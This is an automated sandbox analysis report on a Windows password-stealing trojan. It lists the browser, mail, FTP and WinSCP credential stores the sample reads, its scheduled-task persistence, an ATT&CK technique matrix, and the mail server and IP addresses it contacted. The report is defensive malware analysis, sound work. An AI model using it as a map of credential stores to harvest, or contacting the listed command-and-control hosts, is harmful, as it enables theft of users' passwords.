                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: Yara matchFile source: 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.525739728.0000000003164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.525329197.0000000002B54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IwUNvHNy.exe PID: 5060, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IwUNvHNy.exe PID: 5060, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job
                Boot or Logon Initialization Scripts1
                Scheduled Task/Job
                1
                Deobfuscate/Decode Files or Information
                111
                Input Capture
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                1
                Credentials in Registry
                1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration1
                Non-Standard Port
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
                Software Packing
                NTDS211
                Security Software Discovery
                Distributed Component Object Model111
                Input Capture
                Scheduled Transfer2
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                Data Transfer Size Limits23
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                Process Injection
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 756190 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Sigma detected: Scheduled temp file as task from temp location 2->49 51 7 other signatures 2->51 7 SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe 6 2->7         started        11 IwUNvHNy.exe 5 2->11         started        process3 file4 27 C:\Users\user\AppData\Roaming\IwUNvHNy.exe, PE32 7->27 dropped 29 C:\Users\user\AppData\Local\...\tmp2885.tmp, XML 7->29 dropped 31 SecuriteInfo.com.W...18868.10449.exe.log, ASCII 7->31 dropped 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->53 55 May check the online IP address of the machine 7->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->57 59 Uses schtasks.exe or at.exe to add and modify task schedules 7->59 13 SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe 15 3 7->13         started        17 schtasks.exe 1 7->17         started        61 Machine Learning detection for dropped file 11->61 63 Injects a PE file into a foreign processes 11->63 19 IwUNvHNy.exe 14 3 11->19         started        21 schtasks.exe 1 11->21         started        signatures5 process6 dnsIp7 33 strictfacilityservices.com 111.118.212.38, 49718, 49723, 587 PUBLIC-DOMAIN-REGISTRYUS India 13->33 35 mail.strictfacilityservices.com 13->35 43 2 other IPs or domains 13->43 65 Installs a global keyboard hook 13->65 23 conhost.exe 17->23         started        37 mail.strictfacilityservices.com 19->37 39 3.232.242.170, 443, 49720 AMAZON-AESUS United States 19->39 41 api.ipify.org 19->41 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->67 69 Tries to steal Mail credentials (via file / registry access) 19->69 71 Tries to harvest and steal ftp login credentials 19->71 73 Tries to harvest and steal browser information (history, passwords, etc) 19->73 25 conhost.exe 21->25         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\IwUNvHNy.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                https://LwV7dxVvQwzS29UTCu.com0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://UrUbMY.com0%Avira URL Cloudsafe
                https://api.ipify.orgmail.strictfacilityservices.comaccounts0%Avira URL Cloudsafe
                http://mail.strictfacilityservices.com0%Avira URL Cloudsafe
                http://strictfacilityservices.com0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.ipify.org.herokudns.com
                3.220.57.224
                truefalse
                  unknown
                  strictfacilityservices.com
                  111.118.212.38
                  truetrue
                    unknown
                    api.ipify.org
                    unknown
                    unknownfalse
                      high
                      mail.strictfacilityservices.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://mail.strictfacilityservices.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537441042.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://UrUbMY.comIwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://LwV7dxVvQwzS29UTCu.comIwUNvHNy.exe, 0000000E.00000002.533988988.00000000033AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://strictfacilityservices.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tiro.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.ipify.orgmail.strictfacilityservices.comaccountsIwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designersSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.goodfont.co.krSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comlSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.ipify.orgSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://fontfabrik.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiIwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fonts.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sandoll.co.krSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.sakkal.comSecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  3.232.242.170
                                                  unknownUnited States
                                                  14618AMAZON-AESUSfalse
                                                  111.118.212.38
                                                  strictfacilityservices.comIndia
                                                  394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                  3.220.57.224
                                                  api.ipify.org.herokudns.comUnited States
                                                  14618AMAZON-AESUSfalse
                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:756190
                                                  Start date and time:2022-11-29 19:35:29 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 9m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:17
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@12/5@8/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 79
                                                  • Number of non-executed functions: 6
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  TimeTypeDescription
                                                  19:36:46API Interceptor443x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe modified
                                                  19:36:53Task SchedulerRun new task: IwUNvHNy path: C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  19:37:30API Interceptor111x Sleep call for process: IwUNvHNy.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  3.232.242.170a-Skjkmfvbkv.bin.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  library_2.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/?format=xml
                                                  271-20221017-86198_98-WS-271-171022151632006-3030-1.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  #U041f#U043b#U0430#U0449#U0430#U043d#U0435.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  d616314c.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  SecuriteInfo.com.Win32.Malware-gen.21488.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  SecuriteInfo.com.NSIS.Injector.AOW.tr.23479.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  SecuriteInfo.com.IL.Trojan.MSILZilla.16636.8959.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  GxsZM5JTef.dllGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  48oiMWySgT.dllGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  P8F24RBu0U.docGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  J09ndcF0J1.docGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  s2205K1342.docGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  if.bin.dllGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  w3342l2579.docGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  if.dllGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  if.dllGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  if.dllGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  mixshop_20211229-065147.exeGet hashmaliciousBrowse
                                                  • api.ipify.org/?format=xml
                                                  FAB2BBA2.docGet hashmaliciousBrowse
                                                  • api.ipify.org/
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  api.ipify.org.herokudns.coma-Skjkmfvbkv.bin.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  SIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                                  • 54.91.59.199
                                                  MEPS-42.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  ORDER.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  DHJ59300948.xlsGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  Quotation.exeGet hashmaliciousBrowse
                                                  • 54.91.59.199
                                                  Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  Wzf4gWTOC2.exeGet hashmaliciousBrowse
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exeGet hashmaliciousBrowse
                                                  • 54.91.59.199
                                                  SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exeGet hashmaliciousBrowse
                                                  • 54.91.59.199
                                                  buH9VrC1dQ.exeGet hashmaliciousBrowse
                                                  • 54.91.59.199
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  AMAZON-AESUSa-Skjkmfvbkv.bin.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1sGet hashmaliciousBrowse
                                                  • 44.199.49.219
                                                  SIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3DGet hashmaliciousBrowse
                                                  • 34.226.96.6
                                                  robinbot_sample2Get hashmaliciousBrowse
                                                  • 3.84.38.38
                                                  SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652Get hashmaliciousBrowse
                                                  • 54.204.125.248
                                                  robinbotGet hashmaliciousBrowse
                                                  • 34.229.40.203
                                                  robinbotGet hashmaliciousBrowse
                                                  • 34.229.40.203
